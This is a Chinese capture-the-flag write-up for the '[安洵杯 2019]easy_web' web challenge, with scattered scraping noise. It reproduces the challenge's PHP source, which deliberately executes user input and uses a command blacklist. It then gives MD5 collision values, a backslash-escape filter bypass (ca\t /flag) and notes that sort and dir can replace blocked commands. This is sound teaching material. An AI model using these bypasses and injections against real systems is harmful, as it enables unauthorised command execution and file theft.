[安洵杯 2019]easy_web

admin

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
& l2 L* ]0 O$ o- J8 Z# w/ W' |/ l$ p<p>&nbsp;</p>
<p>&nbsp;</p>
1 ~2 C5 R/ {, e0 _& z- j<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>&nbsp;</p>
; p% M) B' v7 J+ X7 |<p>&nbsp;</p>
<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
3 r# d  x, M7 [  f: H<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
4 M7 b9 N# `3 |/ P! y<p>首先把那个进行一次base64位解码</p>
2 {. W/ z* {# d" e& v<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
1 J/ P1 F; ?2 K1 Y<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>&nbsp;</p>
9 [* ^  i8 h9 G<p>&nbsp;</p>
* V+ j- Z" R* D2 R& p( j! K7 B<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
5 d' |  t, w% v, V<p>　　用同样的方法把index.php进行加密</p>
9 ?0 u) a; |: O& q<div class="cnblogs_Highlighter">
) t4 c, ?. q# _3 C1 c<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
; N8 n8 _3 h6 ~) S7 a</div>
8 R* R1 J. Z  D  s<p>　　然后输入到地址栏</p>
9 E6 V  d5 e* E/ A; e6 Z<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
4 x' m: j6 m* W7 n9 ~8 E* v( _<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
, T! K4 }; |9 `4 w$ ~</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
1 [' z3 i' z9 ?( H( T" s    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));

</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
; u4 [1 v. |+ _; B% f1 M    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
0 q( t7 U7 y* K, J9 v' Q, H0 D0 d: \    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
4 P) R) h$ U3 }: l9 J' {5 z! Q}
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
( w' k: O& Q, F0 V</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
& e$ T7 r' j6 z    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
+ b: F4 y6 G/ g+ p) }& N" [} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
* |! `) Z2 L/ ?; {- y    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }
7 A. r+ ]% {2 [' o; t4 L}

  H) P- E0 p2 ?& y4 _! X' Y2 d$ A</span>?&gt;
  b) ]. z0 D4 T* v! h9 L! {  I; e&lt;html&gt;
! Q7 f3 _' w' _3 u1 u- ^6 L% U, @&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
% Z: w, G2 E  K) {, L   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
' m7 j, _! l* T<span style="color: rgba(0, 0, 0, 1)">}
9 _- I  m" b8 ?5 b: W9 \9 r" F0 ~</span>&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>结合前面的推断，关键代码就在</p>
- @# o% t3 C  d! M+ c, j<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }</span></pre>
</div>
<p>这种MD5是md5强碰撞</p>
9 O6 e, P5 Q- _( m- P<div class="cnblogs_Highlighter">
7 w6 L, V& t! e! V<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
: T# d& C8 B: k6 \<div class="cnblogs_Highlighter">
1 N- L6 T1 e! @9 ]& v<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
- [( r( a& a3 _! d% i</div>
& k; i0 M: C/ [: ^0 W<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
8 M, J5 z# c6 m3 \# ]<p>于是采用payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
( ^6 {  [# z. j8 F" n  O! ^<p>&nbsp;</p>
! F- g3 u: Y* B- X<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
9 b. j2 [3 e" ?& x4 t/ u7 P# z, J1 I, Z<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
<p>于是payload:</p>
<div class="cnblogs_Highlighter">
. H/ r0 A2 k9 P2 N4 f<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
9 ~+ k3 C- o# n0 l+ X5 X</pre>
</div>
+ H1 E. @3 g$ F  }4 i* Q& b* h<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
3 ^& Z# T1 {! g; t. z<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
<p>&nbsp;</p>